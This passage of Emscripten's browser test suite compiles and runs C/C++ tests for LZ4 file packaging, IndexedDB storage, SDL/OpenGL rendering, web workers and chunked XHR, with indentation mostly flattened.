self.btest(Path('fs/test_lz4fs.cpp'), '2', args=['--pre-js', 'files.js', '-sLZ4=1', '-sFORCE_FILESYSTEM'])
print(' opts')
self.btest(Path('fs/test_lz4fs.cpp'), '2', args=['--pre-js', 'files.js', '-sLZ4=1', '-sFORCE_FILESYSTEM', '-O2'])
print(' modularize')
self.compile_btest([test_file('fs/test_lz4fs.cpp'), '--pre-js', 'files.js', '-sLZ4=1', '-sFORCE_FILESYSTEM', '-sMODULARIZE=1'])
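# With -sMODULARIZE the output script defines a factory function instead of running
# automatically, so the page has to instantiate it itself; in recent Emscripten versions
# the factory also returns a Promise of the instance, e.g. (sketch):
#   Module().then((instance) => { /* running module */ });
# The minimal page below just calls Module() and lets the default reporting run.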
create_file('a.html', '''
<script src="a.out.js"></script>
<script>
Module()
</script>
''')
self.run_browser('a.html', '.', '/report_result?2')
# load the data into LZ4FS manually at runtime. This means we compress on the client. This is generally not recommended
print('manual')
subprocess.check_output([FILE_PACKAGER, 'files.data', '--preload', 'file1.txt', 'subdir/file2.txt', 'file3.txt', '--separate-metadata', '--js-output=files.js'])
self.btest(Path('fs/test_lz4fs.cpp'), '1', args=['-DLOAD_MANUALLY', '-sLZ4=1', '-sFORCE_FILESYSTEM'])
print(' opts')
self.btest(Path('fs/test_lz4fs.cpp'), '1', args=['-DLOAD_MANUALLY', '-sLZ4=1', '-sFORCE_FILESYSTEM', '-O2'])
print(' opts+closure')
self.btest(Path('fs/test_lz4fs.cpp'), '1', args=['-DLOAD_MANUALLY', '-sLZ4=1', '-sFORCE_FILESYSTEM', '-O2', '--closure=1', '-g1', '-sCLOSURE_WARNINGS=quiet'])
'''# non-lz4 for comparison
try:
os.mkdir('files')
except OSError:
pass
shutil.copyfile('file1.txt', Path('files/file1.txt'))
shutil.copyfile('file2.txt', Path('files/file2.txt'))
shutil.copyfile('file3.txt', Path('files/file3.txt'))
out = subprocess.check_output([FILE_PACKAGER, 'files.data', '--preload', 'files/file1.txt', 'files/file2.txt', 'files/file3.txt'])
create_file('files.js', out, binary=True)
self.btest(Path('fs/test_lz4fs.cpp'), '2', args=['--pre-js', 'files.js'])'''
def test_separate_metadata_later(self):
# see issue #6654 - we need to handle separate-metadata both when we run before
# the main program, and when we are run later
create_file('data.dat', ' ')
self.run_process([FILE_PACKAGER, 'more.data', '--preload', 'data.dat', '--separate-metadata', '--js-output=more.js'])
self.btest(Path('browser/separate_metadata_later.cpp'), '1', args=['-sFORCE_FILESYSTEM'])
def test_idbstore(self):
secret = str(time.time())
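# Each iteration re-runs the same binary against the persistent IndexedDB store; the
# stage number selects the operation (store, check, delete, ...) implemented in idbstore.c.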
for stage in [0, 1, 2, 3, 0, 1, 2, 0, 0, 1, 4, 2, 5]:
self.clear()
print(stage)
self.btest_exit(test_file('idbstore.c'), args=['-lidbstore.js', '-DSTAGE=' + str(stage), '-DSECRET=\"' + secret + '\"'])
def test_idbstore_sync(self):
secret = str(time.time())
self.clear()
self.btest(test_file('idbstore_sync.c'), '6', args=['-lidbstore.js', '-DSECRET=\"' + secret + '\"', '--memory-init-file', '1', '-O3', '-g2', '-sASYNCIFY'])
def test_idbstore_sync_worker(self):
secret = str(time.time())
self.btest(test_file('idbstore_sync_worker.c'), expected='0', args=['-lidbstore.js', '-DSECRET=\"' + secret + '\"', '--memory-init-file', '1', '-O3', '-g2', '--proxy-to-worker', '-sINITIAL_MEMORY=80MB', '-sASYNCIFY'])
def test_force_exit(self):
self.btest_exit('force_exit.c', assert_returncode=10)
def test_sdl_pumpevents(self):
# key events should be detected using SDL_PumpEvents
create_file('pre.js', '''
function keydown(c) {
var event = new KeyboardEvent("keydown", { 'keyCode': c, 'charCode': c, 'view': window, 'bubbles': true, 'cancelable': true });
document.dispatchEvent(event);
}
''')
self.btest_exit('sdl_pumpevents.c', assert_returncode=7, args=['--pre-js', 'pre.js', '-lSDL', '-lGL'])
def test_sdl_canvas_size(self):
self.btest_exit('sdl_canvas_size.c',
args=['-O2', '--minify=0', '--shell-file',
test_file('sdl_canvas_size.html'), '-lSDL', '-lGL'])
@requires_graphics_hardware
def test_sdl_gl_read(self):
# SDL, OpenGL, readPixels
self.compile_btest([test_file('sdl_gl_read.c'), '-o', 'something.html', '-lSDL', '-lGL'])
self.run_browser('something.html', '.', '/report_result?1')
@requires_graphics_hardware
def test_sdl_gl_mapbuffers(self):
self.btest('sdl_gl_mapbuffers.c', expected='1', args=['-sFULL_ES3=1', '-lSDL', '-lGL'],
message='You should see a blue triangle.')
@requires_graphics_hardware
def test_sdl_ogl(self):
shutil.copyfile(test_file('screenshot.png'), 'screenshot.png')
self.btest('sdl_ogl.c', reference='screenshot-gray-purple.png', reference_slack=1,
args=['-O2', '--minify=0', '--preload-file', 'screenshot.png', '-sLEGACY_GL_EMULATION', '--use-preload-plugins', '-lSDL', '-lGL'],
message='You should see an image with gray at the top.')
@requires_graphics_hardware
def test_sdl_ogl_regal(self):
shutil.copyfile(test_file('screenshot.png'), 'screenshot.png')
self.btest('sdl_ogl.c', reference='screenshot-gray-purple.png', reference_slack=1,
args=['-O2', '--minify=0', '--preload-file', 'screenshot.png', '-sUSE_REGAL', '-DUSE_REGAL', '--use-preload-plugins', '-lSDL', '-lGL'],
message='You should see an image with gray at the top.')
@requires_graphics_hardware
def test_sdl_ogl_defaultmatrixmode(self):
shutil.copyfile(test_file('screenshot.png'), 'screenshot.png')
self.btest('sdl_ogl_defaultMatrixMode.c', reference='screenshot-gray-purple.png', reference_slack=1,
args=['--minify=0', '--preload-file', 'screenshot.png', '-sLEGACY_GL_EMULATION', '--use-preload-plugins', '-lSDL', '-lGL'],
message='You should see an image with gray at the top.')
@requires_graphics_hardware
def test_sdl_ogl_p(self):
# Immediate mode with pointers
shutil.copyfile(test_file('screenshot.png'), 'screenshot.png')
self.btest('sdl_ogl_p.c', reference='screenshot-gray.png', reference_slack=1,
args=['--preload-file', 'screenshot.png', '-sLEGACY_GL_EMULATION', '--use-preload-plugins', '-lSDL', '-lGL'],
message='You should see an image with gray at the top.')
@requires_graphics_hardware
def test_sdl_ogl_proc_alias(self):
shutil.copyfile(test_file('screenshot.png'), 'screenshot.png')
self.btest('sdl_ogl_proc_alias.c', reference='screenshot-gray-purple.png', reference_slack=1,
args=['-O2', '-g2', '-sINLINING_LIMIT', '--preload-file', 'screenshot.png', '-sLEGACY_GL_EMULATION', '--use-preload-plugins', '-lSDL', '-lGL'])
@requires_graphics_hardware
def test_sdl_fog_simple(self):
shutil.copyfile(test_file('screenshot.png'), 'screenshot.png')
self.btest('sdl_fog_simple.c', reference='screenshot-fog-simple.png',
args=['-O2', '--minify=0', '--preload-file', 'screenshot.png', '-sLEGACY_GL_EMULATION', '--use-preload-plugins', '-lSDL', '-lGL'],
message='You should see an image with fog.')
@requires_graphics_hardware
def test_sdl_fog_negative(self):
shutil.copyfile(test_file('screenshot.png'), 'screenshot.png')
self.btest('sdl_fog_negative.c', reference='screenshot-fog-negative.png',
args=['--preload-file', 'screenshot.png', '-sLEGACY_GL_EMULATION', '--use-preload-plugins', '-lSDL', '-lGL'],
message='You should see an image with fog.')
@requires_graphics_hardware
def test_sdl_fog_density(self):
shutil.copyfile(test_file('screenshot.png'), 'screenshot.png')
self.btest('sdl_fog_density.c', reference='screenshot-fog-density.png',
args=['--preload-file', 'screenshot.png', '-sLEGACY_GL_EMULATION', '--use-preload-plugins', '-lSDL', '-lGL'],
message='You should see an image with fog.')
@requires_graphics_hardware
def test_sdl_fog_exp2(self):
shutil.copyfile(test_file('screenshot.png'), 'screenshot.png')
self.btest('sdl_fog_exp2.c', reference='screenshot-fog-exp2.png',
args=['--preload-file', 'screenshot.png', '-sLEGACY_GL_EMULATION', '--use-preload-plugins', '-lSDL', '-lGL'],
message='You should see an image with fog.')
@requires_graphics_hardware
def test_sdl_fog_linear(self):
shutil.copyfile(test_file('screenshot.png'), 'screenshot.png')
self.btest('sdl_fog_linear.c', reference='screenshot-fog-linear.png', reference_slack=1,
args=['--preload-file', 'screenshot.png', '-sLEGACY_GL_EMULATION', '--use-preload-plugins', '-lSDL', '-lGL'],
message='You should see an image with fog.')
@requires_graphics_hardware
def test_glfw(self):
self.btest_exit('glfw.c', args=['-sLEGACY_GL_EMULATION', '-lglfw', '-lGL'])
self.btest_exit('glfw.c', args=['-sLEGACY_GL_EMULATION', '-sUSE_GLFW=2', '-lglfw', '-lGL'])
def test_glfw_minimal(self):
self.btest_exit('glfw_minimal.c', args=['-lglfw', '-lGL'])
self.btest_exit('glfw_minimal.c', args=['-sUSE_GLFW=2', '-lglfw', '-lGL'])
def test_glfw_time(self):
self.btest_exit('test_glfw_time.c', args=['-sUSE_GLFW=3', '-lglfw', '-lGL'])
def _test_egl_base(self, *args):
self.btest_exit(test_file('test_egl.c'), args=['-O2', '-lEGL', '-lGL'] + list(args))
@requires_graphics_hardware
def test_egl(self):
self._test_egl_base()
@requires_threads
@requires_graphics_hardware
def test_egl_with_proxy_to_pthread(self):
self._test_egl_base('-sUSE_PTHREADS', '-sPROXY_TO_PTHREAD', '-sOFFSCREEN_FRAMEBUFFER')
def _test_egl_width_height_base(self, *args):
self.btest_exit(test_file('test_egl_width_height.c'), args=['-O2', '-lEGL', '-lGL'] + list(args))
def test_egl_width_height(self):
self._test_egl_width_height_base()
@requires_threads
def test_egl_width_height_with_proxy_to_pthread(self):
self._test_egl_width_height_base('-sUSE_PTHREADS', '-sPROXY_TO_PTHREAD')
@requires_graphics_hardware
def test_egl_createcontext_error(self):
self.btest_exit('test_egl_createcontext_error.c', args=['-lEGL', '-lGL'])
def test_worker(self):
# Test running in a web worker
create_file('file.dat', 'data for worker')
create_file('main.html', '''
<html>
<body>
Worker Test
<script>
var worker = new Worker('worker.js');
worker.onmessage = function(event) {
var xhr = new XMLHttpRequest();
xhr.open('GET', 'http://localhost:%s/report_result?' + event.data);
xhr.send();
setTimeout(function() { window.close() }, 1000);
};
</script>
</body>
</html>
''' % self.port)
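# Build the worker twice: once with file.dat preloaded into its virtual FS and once
# without, and check the reported output in both cases.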
for file_data in [1, 0]:
cmd = [EMCC, test_file('hello_world_worker.cpp'), '-o', 'worker.js'] + (['--preload-file', 'file.dat'] if file_data else [])
print(cmd)
self.run_process(cmd)
self.assertExists('worker.js')
self.run_browser('main.html', '', '/report_result?hello from worker, and :' + ('data for w' if file_data else '') + ':')
self.assertContained('you should not see this text when in a worker!', self.run_js('worker.js')) # code should run standalone too
def test_mmap_lazyfile(self):
create_file('lazydata.dat', 'hello world')
create_file('pre.js', '''
Module["preInit"] = () => {
FS.createLazyFile('/', "lazy.txt", "lazydata.dat", true, false);
}
''')
self.emcc_args += ['--pre-js=pre.js', '--proxy-to-worker']
self.btest_exit(test_file('test_mmap_lazyfile.c'))
@no_firefox('keeps sending OPTIONS requests, and eventually errors')
def test_chunked_synchronous_xhr(self):
main = 'chunked_sync_xhr.html'
worker_filename = "download_and_checksum_worker.js"
create_file(main, r"""
<!doctype html>
<html>
<head><meta charset="utf-8"><title>Chunked XHR</title></head>
<body>
Chunked XHR Web Worker Test
<script>
var worker = new Worker(""" + json.dumps(worker_filename) + r""");
var buffer = [];
worker.onmessage = function(event) {
if (event.data.channel === "stdout") {
var xhr = new XMLHttpRequest();
xhr.open('GET', 'http://localhost:%s/report_result?' + event.data.line);
xhr.send();
setTimeout(function() { window.close() }, 1000);
} else {
if (event.data.trace) event.data.trace.split("\n").map(function(v) { console.error(v); });
if (event.data.line) {
console.error(event.data.line);
} else {
var v = event.data.char;
if (v == 10) {
var line = buffer.splice(0);
console.error(line = line.map(function(charCode){return String.fromCharCode(charCode);}).join(''));
} else {
buffer.push(v);
}
}
}
};
</script>
</body>
</html>
""" % self.port)
create_file('worker_prejs.js', r"""
if (typeof(Module) === "undefined") Module = {};
Module["arguments"] = ["/bigfile"];
Module["preInit"] = function() {
FS.createLazyFile('/', "bigfile", "http://localhost:11111/bogus_file_path", true, false);
};
var doTrace = true;
Module["print"] = function(s) { self.postMessage({channel: "stdout", line: s}); };
Module["printErr"] = function(s) { self.postMessage({channel: "stderr", char: s, trace: ((doTrace && s === 10) ? new Error().stack : null)}); doTrace = false; };
""")
# vs. os.path.join(self.get_dir(), filename)
# vs. test_file('hello_world_gles.c')
self.compile_btest([test_file('checksummer.c'), '-g', '-sSMALL_XHR_CHUNKS', '-o', worker_filename,
'--pre-js', 'worker_prejs.js'])
chunkSize = 1024
data = os.urandom(10 * chunkSize + 1) # 10 full chunks and one 1 byte chunk
checksum = zlib.adler32(data) & 0xffffffff # mask to an unsigned 32-bit value
server = multiprocessing.Process(target=test_chunked_synchronous_xhr_server, args=(True, chunkSize, data, checksum, self.port))
server.start()
# block until the server is actually ready
last_error = None
for _ in range(60):
  try:
    urlopen('http://localhost:11111')
    break
  except Exception as e:
    # keep a reference: the except-clause variable goes out of scope after the clause
    last_error = e
    print('(sleep for server)')
    time.sleep(1)
else:
  # the old `if i == 60` check could never trigger since range(60) stops at 59;
  # use for/else and re-raise the last connection error if the server never came up
  raise last_error
try:
self.run_browser(main, 'Chunked binary synchronous XHR in Web Workers!', '/report_result?' + str(checksum))
finally:
server.terminate()
# Avoid race condition on cleanup, wait a bit so that processes have released file locks so that test tearDown won't
# attempt to rmdir() files in use.
if WINDOWS:
time.sleep(2)
@requires_graphics_hardware
def test_glgears(self, extra_args=[]):
self.btest('hello_world_gles.c', reference='gears.png', reference_slack=3,
args=['-DHAVE_BUILTIN_SINCOS', '-lGL', '-lglut'] + extra_args)
@requires_graphics_hardware
@requires_threads
def test_glgears_pthreads(self, extra_args=[]):
# test that a program that doesn't use pthreads still works with pthreads enabled
# (regression test for https://github.com/emscripten-core/emscripten/pull/8059#issuecomment-488105672)
self.test_glgears(['-sUSE_PTHREADS'])
@requires_graphics_hardware
@parameterized({
'': (False,),
'proxy': (True,)
})
def test_glgears_long(self, proxy):
args = ['-DHAVE_BUILTIN_SINCOS', '-DLONGTEST', '-lGL', '-lglut', '-DANIMATE']
if proxy:
args += ['--proxy-to-worker']
self.btest('hello_world_gles.c', expected='0', args=args)
@requires_graphics_hardware
def test_glgears_animation(self):
for filename in ['hello_world_gles.c', 'hello_world_gles_full.c', 'hello_world_gles_full_944.c']:
print(filename)
cmd = [test_file(filename), '-o', 'something.html',
'-DHAVE_BUILTIN_SINCOS', '-sGL_TESTING', '-lGL', '-lglut',
'--shell-file', test_file('hello_world_gles_shell.html')]
if 'full' in filename:
cmd += ['-sFULL_ES2=1']
self.compile_btest(cmd)
self.run_browser('something.html', 'You should see animating gears.', '/report_gl_result?true')
@requires_graphics_hardware
def test_fulles2_sdlproc(self):
self.btest_exit('full_es2_sdlproc.c', assert_returncode=1, args=['-sGL_TESTING', '-DHAVE_BUILTIN_SINCOS', '-sFULL_ES2', '-lGL', '-lSDL', '-lglut'])
@requires_graphics_hardware
def test_glgears_deriv(self):
self.btest('hello_world_gles_deriv.c', reference='gears.png', reference_slack=2,
args=['-DHAVE_BUILTIN_SINCOS', '-lGL', '-lglut'],
message='You should see animating gears.')
assert 'gl-matrix' not in read_file('test.html'), 'Should not include glMatrix when not needed'
@requires_graphics_hardware
def test_glbook(self):
self.emcc_args.remove('-Werror')
programs = self.get_library('third_party/glbook', [
Path('Chapter_2/Hello_Triangle', 'CH02_HelloTriangle.o'),
Path('Chapter_8/Simple_VertexShader', 'CH08_SimpleVertexShader.o'),
Path('Chapter_9/Simple_Texture2D', 'CH09_SimpleTexture2D.o'),
Path('Chapter_9/Simple_TextureCubemap', 'CH09_TextureCubemap.o'),
Path('Chapter_9/TextureWrap', 'CH09_TextureWrap.o'),
Path('Chapter_10/MultiTexture', 'CH10_MultiTexture.o'),
Path('Chapter_13/ParticleSystem', 'CH13_ParticleSystem.o'),
], configure=None)
def book_path(*pathelems):
return test_file('third_party/glbook', *pathelems)
for program in programs:
print(program)
basename = os.path.basename(program)
args = ['-lGL', '-lEGL', '-lX11']
if basename == 'CH10_MultiTexture.o':
shutil.copyfile(book_path('Chapter_10', 'MultiTexture', 'basemap.tga'), 'basemap.tga')
shutil.copyfile(book_path('Chapter_10', 'MultiTexture', 'lightmap.tga'), 'lightmap.tga')
args += ['--preload-file', 'basemap.tga', '--preload-file', 'lightmap.tga']
elif basename == 'CH13_ParticleSystem.o':
shutil.copyfile(book_path('Chapter_13', 'ParticleSystem', 'smoke.tga'), 'smoke.tga')
args += ['--preload-file', 'smoke.tga', '-O2'] # test optimizations and closure here as well for more coverage
self.btest(program,
reference=book_path(basename.replace('.o', '.png')),
args=args)
@requires_graphics_hardware
@parameterized({
'normal': (['-sFULL_ES2=1'],),
# Enabling FULL_ES3 also enables ES2 automatically
'full_es3': (['-sFULL_ES3=1'],)
})
def test_gles2_emulation(self, args):
print(args)
shutil.copyfile(test_file('third_party/glbook/Chapter_10/MultiTexture/basemap.tga'), 'basemap.tga')
shutil.copyfile(test_file('third_party/glbook/Chapter_10/MultiTexture/lightmap.tga'), 'lightmap.tga')
shutil.copyfile(test_file('third_party/glbook/Chapter_13/ParticleSystem/smoke.tga'), 'smoke.tga')
for source, reference in [
(Path('third_party/glbook/Chapter_2', 'Hello_Triangle', 'Hello_Triangle_orig.c'), test_file('third_party/glbook/CH02_HelloTriangle.png')),
# (Path('third_party/glbook/Chapter_8', 'Simple_VertexShader', 'Simple_VertexShader_orig.c'), test_file('third_party/glbook/CH08_SimpleVertexShader.png')), # XXX needs INT extension in WebGL
(Path('third_party/glbook/Chapter_9', 'TextureWrap', 'TextureWrap_orig.c'), test_file('third_party/glbook/CH09_TextureWrap.png')),
# (Path('third_party/glbook/Chapter_9', 'Simple_TextureCubemap', 'Simple_TextureCubemap_orig.c'), test_file('third_party/glbook/CH09_TextureCubemap.png')), # XXX needs INT extension in WebGL
(Path('third_party/glbook/Chapter_9', 'Simple_Texture2D', 'Simple_Texture2D_orig.c'), test_file('third_party/glbook/CH09_SimpleTexture2D.png')),
(Path('third_party/glbook/Chapter_10', 'MultiTexture', 'MultiTexture_orig.c'), test_file('third_party/glbook/CH10_MultiTexture.png')),
(Path('third_party/glbook/Chapter_13', 'ParticleSystem', 'ParticleSystem_orig.c'), test_file('third_party/glbook/CH13_ParticleSystem.png')),
]:
print(source)
self.btest(source,
reference=reference,
args=['-I' + test_file('third_party/glbook/Common'),
test_file('third_party/glbook/Common/esUtil.c'),
test_file('third_party/glbook/Common/esShader.c'),
test_file('third_party/glbook/Common/esShapes.c'),
test_file('third_party/glbook/Common/esTransform.c'),
'-lGL', '-lEGL', '-lX11',
'--preload-file', 'basemap.tga', '--preload-file', 'lightmap.tga', '--preload-file', 'smoke.tga'] + args)
@requires_graphics_hardware
def test_clientside_vertex_arrays_es3(self):
self.btest('clientside_vertex_arrays_es3.c', reference='gl_triangle.png', args=['-sFULL_ES3=1', '-sUSE_GLFW=3', '-lglfw', '-lGLESv2'])
def test_emscripten_api(self):
self.btest_exit('emscripten_api_browser.c', args=['-sEXPORTED_FUNCTIONS=_main,_third', '-lSDL'])
def test_emscripten_api2(self):
def setup():
create_file('script1.js', '''
Module._set(456);
''')
create_file('file1.txt', 'first')
create_file('file2.txt', 'second')
setup()
self.run_process([FILE_PACKAGER, 'test.data', '--preload', 'file1.txt', 'file2.txt'], stdout=open('script2.js', 'w'))
self.btest_exit('emscripten_api_browser2.c', args=['-sEXPORTED_FUNCTIONS=_main,_set', '-sFORCE_FILESYSTEM'])
# check using file packager to another dir
self.clear()
setup()
ensure_dir('sub')
self.run_process([FILE_PACKAGER, 'sub/test.data', '--preload', 'file1.txt', 'file2.txt'], stdout=open('script2.js', 'w'))
shutil.copyfile(Path('sub/test.data'), 'test.data')
self.btest_exit('emscripten_api_browser2.c', args=['-sEXPORTED_FUNCTIONS=_main,_set', '-sFORCE_FILESYSTEM'])
def test_emscripten_api_infloop(self):
self.btest_exit('emscripten_api_browser_infloop.cpp', assert_returncode=7)
def test_emscripten_fs_api(self):
shutil.copyfile(test_file('screenshot.png'), 'screenshot.png') # preloaded *after* run
self.btest_exit('emscripten_fs_api_browser.c', assert_returncode=1, args=['-lSDL'])
def test_emscripten_fs_api2(self):
self.btest_exit('emscripten_fs_api_browser2.c', assert_returncode=1, args=['-s', "ASSERTIONS=0"])
self.btest_exit('emscripten_fs_api_browser2.c', assert_returncode=1, args=['-s', "ASSERTIONS=1"])
@requires_threads
def test_emscripten_main_loop(self):
for args in [[], ['-sUSE_PTHREADS', '-sPROXY_TO_PTHREAD', '-sEXIT_RUNTIME']]:
self.btest_exit('emscripten_main_loop.cpp', args=args)
@parameterized({
'': ([],),
# test pthreads + AUTO_JS_LIBRARIES mode as well
'pthreads': (['-sUSE_PTHREADS', '-sPROXY_TO_PTHREAD', '-sAUTO_JS_LIBRARIES=0'],),
})
@requires_threads
def test_emscripten_main_loop_settimeout(self, args):
self.btest_exit('emscripten_main_loop_settimeout.cpp', args=args)
@parameterized({
'': ([],),
'pthreads': (['-sUSE_PTHREADS', '-sPROXY_TO_PTHREAD'],),
})
@requires_threads
def test_emscripten_main_loop_and_blocker(self, args):
self.btest_exit('emscripten_main_loop_and_blocker.cpp', args=args)
@requires_threads
def test_emscripten_main_loop_and_blocker_exit(self):
# Same as above but tests that EXIT_RUNTIME works with emscripten_main_loop. The
# app should still stay alive until the loop ends
self.btest_exit('emscripten_main_loop_and_blocker.cpp')
@parameterized({
'': ([],),
'worker': (['--proxy-to-worker'],),
'pthreads': (['-sUSE_PTHREADS', '-sPROXY_TO_PTHREAD'],)
})
@requires_threads
def test_emscripten_main_loop_setimmediate(self, args):
self.btest_exit('emscripten_main_loop_setimmediate.cpp', args=args)
def test_fs_after_main(self):
for args in [[], ['-O1']]:
self.btest('fs_after_main.cpp', '0', args=args)
def test_sdl_quit(self):
self.btest_exit('sdl_quit.c', args=['-lSDL', '-lGL'])
def test_sdl_resize(self):
# FIXME(https://github.com/emscripten-core/emscripten/issues/12978)
self.emcc_args.append('-Wno-deprecated-declarations')
self.btest('sdl_resize.c', '1', args=['-lSDL', '-lGL'])
def test_glshaderinfo(self):
self.btest('glshaderinfo.cpp', '1', args=['-lGL', '-lglut'])
@requires_graphics_hardware
def test_glgetattachedshaders(self):
self.btest('glgetattachedshaders.c', '1', args=['-lGL', '-lEGL'])
# Covered by the dEQP test suite (we can remove it later if we add coverage for that).
@requires_graphics_hardware
def test_glframebufferattachmentinfo(self):
self.btest('glframebufferattachmentinfo.c', '1', args=['-lGLESv2', '-lEGL'])
@requires_graphics_hardware
def test_sdlglshader(self):
self.btest('sdlglshader.c', reference='sdlglshader.png', args=['-O2', '--closure=1', '-sLEGACY_GL_EMULATION', '-lGL', '-lSDL'])
@requires_graphics_hardware
def test_sdlglshader2(self):
self.btest_exit('sdlglshader2.c', args=['-sLEGACY_GL_EMULATION', '-lGL', '-lSDL'], also_proxied=True)
@requires_graphics_hardware
def test_gl_glteximage(self):
self.btest('gl_teximage.c', '1', args=['-lGL', '-lSDL'])
@parameterized({
'': ([],),
'pthreads': (['-sUSE_PTHREADS', '-sPROXY_TO_PTHREAD', '-sOFFSCREEN_FRAMEBUFFER'],),
})
@requires_graphics_hardware
@requires_threads
def test_gl_textures(self, args):
self.btest('gl_textures.cpp', '0', args=['-lGL'] + args)
@requires_graphics_hardware
def test_gl_ps(self):
# pointers and a shader
shutil.copyfile(test_file('screenshot.png'), 'screenshot.png')
self.btest('gl_ps.c', reference='gl_ps.png', args=['--preload-file', 'screenshot.png', '-sLEGACY_GL_EMULATION', '-lGL', '-lSDL', '--use-preload-plugins'], reference_slack=1)
@requires_graphics_hardware
def test_gl_ps_packed(self):
# packed data that needs to be strided
shutil.copyfile(test_file('screenshot.png'), 'screenshot.png')
self.btest('gl_ps_packed.c', reference='gl_ps.png', args=['--preload-file', 'screenshot.png', '-sLEGACY_GL_EMULATION', '-lGL', '-lSDL', '--use-preload-plugins'], reference_slack=1)
@requires_graphics_hardware
def test_gl_ps_strides(self):
shutil.copyfile(test_file('screenshot.png'), 'screenshot.png')
self.btest('gl_ps_strides.c', reference='gl_ps_strides.png', args=['--preload-file', 'screenshot.png', '-sLEGACY_GL_EMULATION', '-lGL', '-lSDL', '--use-preload-plugins'])
@requires_graphics_hardware
def test_gl_ps_worker(self):
shutil.copyfile(test_file('screenshot.png'), 'screenshot.png')
self.btest('gl_ps_worker.c', reference='gl_ps.png', args=['--preload-file', 'screenshot.png', '-sLEGACY_GL_EMULATION', '-lGL', '-lSDL', '--use-preload-plugins'], reference_slack=1, also_proxied=True)
@requires_graphics_hardware
def test_gl_renderers(self):
self.btest('gl_renderers.c', reference='gl_renderers.png', args=['-sGL_UNSAFE_OPTS=0', '-sLEGACY_GL_EMULATION', '-lGL', '-lSDL'])
@requires_graphics_hardware
def test_gl_stride(self):
self.btest('gl_stride.c', reference='gl_stride.png', args=['-sGL_UNSAFE_OPTS=0', '-sLEGACY_GL_EMULATION', '-lGL', '-lSDL'])
@requires_graphics_hardware
def test_gl_vertex_buffer_pre(self):
self.btest('gl_vertex_buffer_pre.c', reference='gl_vertex_buffer_pre.png', args=['-sGL_UNSAFE_OPTS=0', '-sLEGACY_GL_EMULATION', '-lGL', '-lSDL'])
@requires_graphics_hardware
def test_gl_vertex_buffer(self):
self.btest('gl_vertex_buffer.c', reference='gl_vertex_buffer.png', args=['-sGL_UNSAFE_OPTS=0', '-sLEGACY_GL_EMULATION', '-lGL', '-lSDL'], reference_slack=1)
@requires_graphics_hardware
def test_gles2_uniform_arrays(self):
self.btest('gles2_uniform_arrays.cpp', args=['-sGL_ASSERTIONS', '-lGL', '-lSDL'], expected=['1'], also_proxied=True)
@requires_graphics_hardware
def test_gles2_conformance(self):
self.btest('gles2_conformance.cpp', args=['-sGL_ASSERTIONS', '-lGL', '-lSDL'], expected=['1'])
@requires_graphics_hardware
def test_matrix_identity(self):
self.btest('gl_matrix_identity.c', expected=['-1882984448', '460451840', '1588195328', '2411982848'], args=['-sLEGACY_GL_EMULATION', '-lGL', '-lSDL'])
@requires_graphics_hardware
@no_swiftshader
def test_cubegeom_pre(self):
self.btest(Path('third_party/cubegeom', 'cubegeom_pre.c'), reference=Path('third_party/cubegeom', 'cubegeom_pre.png'), args=['-sLEGACY_GL_EMULATION', '-lGL', '-lSDL'])
@requires_graphics_hardware
@no_swiftshader
def test_cubegeom_pre_regal(self):
self.btest(Path('third_party/cubegeom', 'cubegeom_pre.c'), reference=Path('third_party/cubegeom', 'cubegeom_pre.png'), args=['-sUSE_REGAL', '-DUSE_REGAL', '-lGL', '-lSDL'])
@requires_graphics_hardware
@requires_sync_compilation
def test_cubegeom_pre_relocatable(self):
self.btest(Path('third_party/cubegeom', 'cubegeom_pre.c'), reference=Path('third_party/cubegeom', 'cubegeom_pre.png'), args=['-sLEGACY_GL_EMULATION', '-lGL', '-lSDL', '-sRELOCATABLE'])
@requires_graphics_hardware
@no_swiftshader
def test_cubegeom_pre2(self):
self.btest(Path('third_party/cubegeom', 'cubegeom_pre2.c'), reference=Path('third_party/cubegeom', 'cubegeom_pre2.png'), args=['-sGL_DEBUG', '-sLEGACY_GL_EMULATION', '-lGL', '-lSDL']) # some coverage for GL_DEBUG not breaking the build
@requires_graphics_hardware
@no_swiftshader
def test_cubegeom_pre3(self):
self.btest(Path('third_party/cubegeom', 'cubegeom_pre3.c'), reference=Path('third_party/cubegeom', 'cubegeom_pre2.png'), args=['-sLEGACY_GL_EMULATION', '-lGL', '-lSDL'])
@parameterized({
'': ([],),
'tracing': (['-sTRACE_WEBGL_CALLS'],),
})
@requires_graphics_hardware
def test_cubegeom(self, args):
# proxy only in the simple, normal case (we can't trace GL calls when
# proxied)
self.btest(Path('third_party/cubegeom', 'cubegeom.c'), reference=Path('third_party/cubegeom', 'cubegeom.png'), args=['-O2', '-g', '-sLEGACY_GL_EMULATION', '-lGL', '-lSDL'] + args, also_proxied=not args)
@requires_graphics_hardware
def test_cubegeom_regal(self):
self.btest(Path('third_party/cubegeom', 'cubegeom.c'), reference=Path('third_party/cubegeom', 'cubegeom.png'), args=['-O2', '-g', '-DUSE_REGAL', '-sUSE_REGAL', '-lGL', '-lSDL'], also_proxied=True)
@requires_threads
@requires_graphics_hardware
def test_cubegeom_regal_mt(self):
self.btest(Path('third_party/cubegeom', 'cubegeom.c'), reference=Path('third_party/cubegeom', 'cubegeom.png'), args=['-O2', '-g', '-pthread', '-DUSE_REGAL', '-sUSE_PTHREADS', '-sUSE_REGAL', '-lGL', '-lSDL'], also_proxied=False)
@requires_graphics_hardware
def test_cubegeom_proc(self):
create_file('side.c', r'''
extern void* SDL_GL_GetProcAddress(const char *);
void *glBindBuffer = 0; // same name as the gl function, to check that the collision does not break us
void *getBindBuffer() {
if (!glBindBuffer) glBindBuffer = SDL_GL_GetProcAddress("glBindBuffer");
return glBindBuffer;
}
''')
# also test -Os in wasm, which uses meta-dce, which should not break legacy gl emulation hacks
for opts in [[], ['-O1'], ['-Os']]:
self.btest(Path('third_party/cubegeom', 'cubegeom_proc.c'), reference=Path('third_party/cubegeom', 'cubegeom.png'), args=opts + ['side.c', '-sLEGACY_GL_EMULATION', '-lGL', '-lSDL'])
@requires_graphics_hardware
def test_cubegeom_glew(self):
self.btest(Path('third_party/cubegeom', 'cubegeom_glew.c'), reference=Path('third_party/cubegeom', 'cubegeom.png'), args=['-O2', '--closure=1', '-sLEGACY_GL_EMULATION', '-lGL', '-lGLEW', '-lSDL'])
@requires_graphics_hardware
def test_cubegeom_color(self):
self.btest(Path('third_party/cubegeom', 'cubegeom_color.c'), reference=Path('third_party/cubegeom', 'cubegeom_color.png'), args=['-sLEGACY_GL_EMULATION', '-lGL', '-lSDL'])
@requires_graphics_hardware
def test_cubegeom_normal(self):
